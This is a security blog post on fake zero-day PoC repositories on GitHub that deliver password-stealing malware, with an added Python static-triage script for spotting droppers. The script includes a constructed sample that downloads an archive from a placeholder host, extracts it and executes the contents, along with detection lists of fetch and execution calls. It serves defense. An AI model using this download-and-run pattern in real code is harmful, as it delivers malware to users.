GitHub for Zero-Day Malware Distribution


Threat actors posing as security researchers have been using GitHub to distribute malware to unsuspecting victims. Security firm VulnCheck identified GitHub repositories that claim to contain proof-of-concept (PoC) exploits for zero-day vulnerabilities in popular software such as Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. Instead of an exploit, each repository delivers a Python script named poc.py that is simply a downloader for Linux and Windows systems: it checks which operating system it is running on, downloads a matching ZIP file from the internet, extracts it, and executes the payload inside. The Windows payload is flagged by 36 of 61 VirusTotal scanners as a password-stealing trojan; the Linux payload was initially flagged by only three scanners (24 of 61 at the time of writing). Both the Linux and Windows ZIP files also contain a Tor client as part of their install.
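The practical lesson is that a "PoC" handed to you on GitHub deserves a static look before it is executed. As an added example (not code from the original post or from VulnCheck's analysis), the Python script below walks a PoC's abstract syntax tree and flags the fetch/extract/execute dropper pattern described above, resolving import aliases so that `from urllib.request import urlretrieve` or `import subprocess as sp` cannot hide a stage. The two embedded sample scripts are constructed for the demonstration; their URLs are placeholders and nothing is downloaded.

```python
"""Static triage of a downloaded "proof-of-concept" Python script.

Added example, not code from the original post or from VulnCheck. It walks
the script's AST and flags the dropper pattern described above: check the
OS, fetch a remote archive, extract it, execute what came out. Run it
against a PoC before you run the PoC.
"""
import ast
import sys
import textwrap

# Fully qualified names that mark each stage of the fetch/extract/execute
# pattern. Common standard-library and requests entry points; extend to taste.
STAGES = {
    "os_check": {"platform.system", "sys.platform", "os.name"},
    "network_fetch": {
        "urllib.request.urlretrieve", "urllib.request.urlopen",
        "requests.get", "http.client.HTTPSConnection",
    },
    "archive_extract": {"zipfile.ZipFile", "tarfile.open", "shutil.unpack_archive"},
    "execution": {
        "subprocess.Popen", "subprocess.run", "subprocess.call",
        "os.system", "os.startfile", "os.popen", "os.execv", "os.execl",
    },
}


def _import_aliases(tree):
    """Map every name an import binds to the fully qualified thing it refers to."""
    aliases = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for a in node.names:
                if a.asname:                     # import urllib.request as ur
                    aliases[a.asname] = a.name
                else:                            # import urllib.request binds 'urllib'
                    top = a.name.split(".")[0]
                    aliases[top] = top
        elif isinstance(node, ast.ImportFrom) and node.module:
            for a in node.names:                 # from subprocess import Popen as P
                aliases[a.asname or a.name] = f"{node.module}.{a.name}"
    return aliases


def _dotted_name(node):
    """Return 'a.b.c' for a Name or Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _resolve(name, aliases):
    """Rewrite the first component of a dotted name through the import table."""
    head, _, rest = name.partition(".")
    head = aliases.get(head, head)
    return f"{head}.{rest}" if rest else head


def triage(source):
    """Return the stage indicators found in `source` plus an overall verdict.

    'dropper' when the script both fetches from the network and executes
    something, 'review' when any single stage appears, otherwise 'clean'.
    """
    tree = ast.parse(source)
    aliases = _import_aliases(tree)
    found = {stage: set() for stage in STAGES}
    for node in ast.walk(tree):
        name = _dotted_name(node.func if isinstance(node, ast.Call) else node)
        if name is None:
            continue
        full = _resolve(name, aliases)
        for stage, needles in STAGES.items():
            if full in needles:
                found[stage].add(full)
    result = {stage: sorted(names) for stage, names in found.items()}
    if result["network_fetch"] and result["execution"]:
        result["verdict"] = "dropper"
    elif any(result[stage] for stage in STAGES):
        result["verdict"] = "review"
    else:
        result["verdict"] = "clean"
    return result


# Constructed stand-in for a malicious poc.py of the kind described above;
# the URLs are placeholders and download nothing real.
SAMPLE_DROPPER = textwrap.dedent("""
    import platform, zipfile, subprocess
    from urllib.request import urlretrieve

    if platform.system() == "Windows":
        url = "https://example.invalid/win.zip"
    else:
        url = "https://example.invalid/linux.zip"
    urlretrieve(url, "payload.zip")
    with zipfile.ZipFile("payload.zip") as z:
        z.extractall("payload")
    subprocess.Popen(["payload/run"])
""")

# Constructed benign PoC for contrast: one request to a target, no execution.
SAMPLE_BENIGN = textwrap.dedent("""
    import sys
    import requests
    r = requests.get(sys.argv[1], timeout=5)
    print(r.status_code)
""")

if __name__ == "__main__":
    src = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DROPPER
    for stage, names in triage(src).items():
        print(f"{stage}: {names}")
```

Run it as `python triage_poc.py poc.py` against the cloned repository before executing anything. A 'dropper' verdict is a strong signal but the reverse is not a clearance: the script only sees direct Python calls, so a PoC that shells out to `curl` inside an `os.system` string, or a compiled binary, needs a sandbox rather than a parser.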

To drive traffic to their GitHub repositories, the threat actors created Twitter accounts for fake employees of a fictitious cyber security firm, High Sierra Cyber Security. These accounts appear legitimate, with security news posts, followers, and even headshots stolen from real security researchers at well-known security firms. The accounts post about the new zero-day they have supposedly discovered and direct the reader to download the proof-of-concept from GitHub.

How effective Twitter and GitHub are at persuading victims to download the malware isn't clear yet, but there are indicators that the threat actors are having some success. When VulnCheck reported the malicious repositories to GitHub and had them taken down, the threat actors quickly set up new repositories and began directing their Twitter followers to them.

VulnCheck’s blog post of their findings: https://vulncheck.com/blog/fake-repos-deliver-malicious-implant

Bleeping Computer article about VulnCheck’s findings: https://www.bleepingcomputer.com/news/security/fake-zero-day-poc-exploits-on-github-push-windows-linux-malware/

VirusTotal report for Windows payload: https://www.virustotal.com/gui/file/777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4

VirusTotal report for Linux payload: https://www.virustotal.com/gui/file/ba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733/detection
